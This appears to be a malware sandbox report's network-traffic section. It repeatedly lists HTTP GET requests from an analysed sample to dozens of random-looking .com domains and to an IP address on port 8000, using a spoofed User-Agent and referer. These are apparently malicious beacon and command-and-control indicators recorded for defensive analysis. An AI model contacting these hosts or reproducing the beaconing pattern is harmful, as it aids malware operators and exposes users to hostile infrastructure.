Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww8.galyqaz.comConnection: Keep-AliveCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww3.galyqaz.comConnection: Keep-AliveCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0450-397d-84b8-860db74cb63b HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731347439.2338786
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0450-39f1-837b-46255b9c1f17 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731347439.3564880
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731347439.3564880
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731347439.2338786
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731347439.2338786
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0450-586c-82c6-824410e64c84 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731347439.3564880; parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
